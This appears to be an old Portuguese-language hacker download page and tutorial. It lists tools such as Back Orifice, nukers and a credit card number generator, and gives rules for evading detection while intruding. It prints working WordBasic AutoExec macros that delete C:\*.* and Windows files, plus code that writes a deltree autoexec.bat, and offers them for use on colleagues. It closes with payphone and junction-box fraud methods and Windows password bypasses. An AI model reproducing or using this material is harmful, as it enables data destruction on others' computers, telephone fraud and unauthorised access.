Cartão de Crédito
Nome: | Tamanho: | Descrição: |
CardPro | 49 kb | Gera números válidos de cartão de crédito |
Diversos
Nome: | Tamanho: | Descrição: |
Hacker Utilities | 429 kb | Diversos utilitarios hackers |
Email
Anônimo
Nome: | Tamanho: | Descrição: |
AMail | 72 kb | Envia Emails anônimos |
Portscan
e anti-nuke
Nome: | Tamanho: | Descrição: |
ICMPWatch | 20 kb | Alerta se você está sendo nukado |
Portscan | 26 kb | Procura por portas abertas em um IP |
Phreaker
Nome: | Tamanho: | Descrição: |
Phreaker Toolz | 129 kb | Gera sons (tons) de telefone |
Senhas
Nome: | Tamanho: | Descrição: |
Jack 14 | 115 kb | Descobre senhas criptografadas |
Invasor
Nome: | Tamanho: | Descrição: |
Back Orifice | 121 Kb | Ótimo invasor, fornece dados sobre a vitíma. |
Nuke
Nome: | Tamanho: | Descrição: |
Nuke | 141 Kb | Programa para nukar as pessoas. |
Gerador
de CPF
Nome: | Tamanho: | Descrição: |
Fast CPF | 9,26 Kb | Excelente gerador de nº de cpf. |
Simulador
Nome: | Tamanho: | Descrição: |
Sex 2000 | 186 Kb | Programa que simula a formatação de hd. |
Texto Hacker
Mas afinal o que é Hacher? Hacker hoje em dia está associado a pirataria digital, mas existem dois tipos de Hackers:
- Os do bem, que entram em sistemas apenas por diversão e não destroem ou modificam nada (a não ser que seja necessario para não o descubrirem no sistema)
-Os do mal, que derrubam sistemas de empresas e diversos, esse Hacker é conhecido como Cracker, esse sim é uma ameaça para os sistemas, seu objetivo é destrui-lo. Abaixo tem as expecificações de termos usados na WEB
Lamer - é aquele que acaba de fazer parte da rede e se acha o maximo e já que invadir computadores;
Wannabe - é o principiante que aprendeu a usar alguns programas prontos para descobrir senhas ou invadir sistemas (receitas de bolo), entrou num provedor de fundo de quintal e já acha que vai conseguir entrar nos computadores da Nasa;
Newbie - é o novato da rede, e faz varias perguntas que não devia, o NEWBIE é muito paracido com o LAMER, só que ingênuo.
Larva - este já está quase se tornando um hacker. Já consegue desenvolver suas próprias técnicas de como invadir sistemas; Hacker - tem conhecimentos reais de programação e de sistema operacionais, principalmente o Unix, o mais usado dos servidores da Internet. Conhece todas as falhas de segurança dos sistemas e procura achar novas. Desenvolve suas próprias técnicas e desprezas as "receitas de bolo";
Cracker - é o hacker do mal, que invade sistemas, enfim afim de dar problemas à algo ou à alguém;
Phreaker - tem bons conhecimentos de telefonia e consegue inclusive fazer chamadas internacionais sem pagar, o que lhe premite desenvolver seus ataques a partir de um servidor de outro país;
Guru - o supra-sumo dos hackers. Agora que vc já sabe algo sobre Hackers vamos ao que enteressa:
Como ser Hacker
Primeiro nunca pergunte isso a alguem. Para se tornar um Hacker vc tem que ir adquirindo conhecimentos para ir dominando o local onde vc está (a rede).Tudo que você precisa saber:
1.Nunca pergunte como se tornar um hacker;
2.Conhecimento.Poxa... o que é IP?
Apenas alguns surfistas da rede sabem o que é isso.
IP é Internet Protocol.
Onde Começar ?
Comece com sistemas pequenos como em universidades ou escritórios. Depois passe para redes maiores como telenet. A telenet é altamente recomendada para novatos, pois ela tem um sistema de segurança muito vago. São milhares de conexões ao mesmo tempo, o que torna praticamente impossível a monitoração de um usuário .
Regras hackers.
1- Nunca destruir nenhum sistema.
2- Nunca alterar nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada posteriormente.
3- Não compartilhe com ninguém seus projetos Hackers
4- Em uma BBS não é aconselhável que você discuta seus projetos Hackers. BBS's podem ser monitoradas pelo governo.
5- Nunca dê nomes ou telefones reais em uma BBS.
6- Nunca deixe seu apelido em um sistema que você entrou.
7- NÃO entre em computadores governamentais.
8- Nunca converse sobre seus planos Hackers com outra pessoa por nenhum telefone
9- Seja atento, mantenha todo o seu material hacker em um lugar seguro.
10- Para se tornar um verdadeiro hacker você deve simplesmente praticar e adquirir conhecimento
Ética hacker
A ética hacker pode ser definida numa frase: Veja tudo, aprenda tudo, não toque em nada. Crakers
=> Macros do Word
Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto.
Esta materia tem como objetivo fazer desde pequenas até grandes sacanagens com usuarios pentelhos.
ps: Software/versao abrangido: Word da Microsoft®, versões 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Niveis de sacanagem Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Não é mais brincadeira.
Primeiramente você precisa criar uma macro, siga os passos:
Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) este macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e copie a rotina que tem logo mais abaixo.
ps: existe outras formas/meios de criar um macro, mas esta é mais facil
Nivel 1
O nivel 1 serve para você se mostrar, falando que entende do Word melhor do que ninguem. Cada vez que o usuario inicia o Word recebera uma mensagem de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.
Sub MAIN MsgBox "Você é um pentelho! Eu nãoo irei prosseguir com o sistema", "Microsoft Word", 5 MsgBox "Usuário Pirata Detectado", "FATAL ERROR", 16 MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub
Nivel 2
É para deixar o usuario irritadissimo. no corpo da macro cole este texto abaixo:
Sub MAIN ArquivoNovoPadrão Inserir "James" ArquivoNovoPadrão Inserir "Bond" ArquivoNovoPadrão Inserir "007" ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "." ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital " End Sub
Nivel 3
Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe.
Sub MAIN Kill "C:\*.*" Kill "C:\WINDOWS\*.*" Kill "C:\WIN95\*.*" End Sub
Lembre-se de que estes macros, sõo gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicialização, então se você for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes: Existe uma forma de iniciar o Word, sem que inicialize a macro 'AutoExec' mas não irei falar, descubra você mesmo. A macro do word é uma ferramenta riquissima, procure fuçar. Voce pode fazer estas no seu próprio computador (só cuidado!), salvando sempre no arquivo "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para não explodir em você.
=> Como criar um autoexec.bat destrutivo
O exemplo abaixo faz com que o vírus crie um arquivo autoexec.bat destrutivo, fazendo que assim que o computador seja iniciado, o comando deltree será ativado apagando todos os diretórios do computador. Open "C:\autoexec.bat" For Output As #1 Print #1, "@deltree /y *.* >nul" Close #1
=> Apagar um arquivo Esse comando apaga um arquivo: kill "c:\windows\win.com"
Phreaking
Telefonia Brasileira
Por acaso você já contou o quanto de fichas telefonicas já
gastou em sua vida (principalmente quem não tem telefone), agora
imagine e multiplique por R$ 0,10 faça também isso com cartões
telefônicos e ficará pasmo .Agora pessoal, a ficha telefonica
de R$ 0,10 só dá 2 mim. de ligação local (antes era 3mim.).
Agora o cartão telefonico se esgota muito mais rápido. Para
ligações locais de sua casa você vai ter que pagar 270%, a
mais e 30% a mais para Interurbanos. De acordo com o aumento de
abril de 1997. Eu acho uma coisa tão vulgar e tão ladra ter que
pagar para conversar, um sentido que recebemos da natureza, ainda
mais quando se tem aumentos explosivos como esses de hoje em dia.
Hackers do Brasil, vamos mostrar a eles quem é que manda, vamos
desafiá-los e teremos algo que eles nunca farão nos esquecer.
Acompanhe aqui formas de driblar, fraudar, e estraçalhar a
roubalheira da TELESP, TELERJ, EMBRATEL e muitas outros
organizações de telefonia...
Fraudando orelhões
com um aparelho comum
Modo de fraude com
telefone comum à orelhões públicos: Primeiro você deve
arrumar um telefone comum bem pequeno e compacto. Depois você
tem que descascar os fios dele (vão dar em 2 fios). Então
arrume um bom alicate, estilete ou faca e vá até um
orelhão.Descasque os fios do orelhão (descasque, não é para
cortar) pegue os dois fios descascados do orelhão e entrelace
com os dois fios do seu telefone, observe a polarização, ou
seja se o seu telefone portátil ficar sem linha inverta a
posição dos fios telefônicos, pois, ao contrário do que muita
gente pensa o orelhão tem fio negativo e positivo. Agora é só
efetuar a ligação de seu telefone comum
Fraude a orelhões através de notebook
O processo para se conectar notebooks a orelhões, é igual ao de
se conectar telefones comuns. Resumirei nesse item, algumas
considerações a respeito da fiação do notebook, que segue os
padrões da FCC Americana e é um pouco diferente da nossa.O
conector do fio do notebook, é do tipo jack, tem quatro fios
dentro dele. Arranque o conector de plástico transparente que
fica na ponta do fio, pegue os dios fios centrais e separe-os dos
fios das extremidades.Estes dois fios centrais, são os que
serão utilizados para fazer a ligação no orelhão. Eu
aconselho que você coloque jacarés neles (pequeno gancho achado
em qualquer loja de componentes eletrônicos).Basta conectar-se a
BBS's da mesma forma que você se conecta em casa. Caso você
queira testar se está tudo ok, abra um programa de terminal
qualquer e digite ATA, se fizer um barulhinho parecido com o tom
de linha está tudo OK.
Fraude
em Caixa de Verificação
As caixas de
verificação (ou armários na linguagem "técnica" da
TELESP) são caixas de ferro, que geralmente ficam localizadas em
vias públicas, e são utilizadas para se fazer a checagem das
linhas telefônicas e detectar problemas antes que chegue a
central. Tais caixas costumam ser da cor cinza e tem cerca de 1,5
m de altura, com um código em preto escrito na parte
superior.Para fazer tal tipo de fraude, basta, que você pegue um
das dezenas de pares de fios que se encontram lá e entrelaçe
nos 2 fos de seu telefone portátil, cujo qual estará com seus
fios descascados. Observe também a polarização. Vale lembrar
que você não deve destruir a caixa para abrí-la, se é que ela
já não esteja arrombada. Não vá arrombar a droga da caixa.
Isto é coisa pra quem não tem célebro. E você não é um
vândalo, você é um Hacker.OBS : Existem mais umas 2 formas de
fraude, não vou por aqui porque o verdadeiro Hacker descobre o
que necessita. Ser Phreaker é mais que desenvolver um
crime, é desenvolver
uma incrível maneira de se viver...
=> Ligando em orelhões à cartão sem pagar
Usando um cartão usado de 50 ligações, com a parte de trás pintata com grafite 6B
Usando um cartão novo, com a parte de trás pintata com esmalte base de unha
Usando um cartão usado, envolvido por papel alumínio
Usando um cartão usado de 50 ligações, com a parte de trás raspada com uma moeda
Usando um cartão novo, após completar a ligação(a pessoa falar Aló)segura-se o nº9 tira o cartão e continue segurando o botão até acabar de falar.
=> Regras Phreakers :
1- Nunca use as boxes na linha da sua casa
2- Nunca converse sobre seus projetos phreakers na linha de sua casa
3- Nunca use seu nome real quando fazer o phreak
4- Seja cuidadoso com que comentar sobre seus projetos preakers
5- Nunca deixe material phreak em qualquer lugar, sempre tenha um esconderijo para guardá-lo protegido.
6- Não seja pego
Senhas
Como adivinhar uma Senha
Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando por base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se divinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação. omo podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícel de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.
Bios Password
Se você pegar o computador desligado ou esquecer o password:
- Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou ou coloque od dados padrao.
Password do Windows
Para quebrar o password do Windows 3.x você deve digitar"ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".
Para quebrar o password no WIN95:
1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar.
2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=".
Screen Saver Password
Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password.
Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas.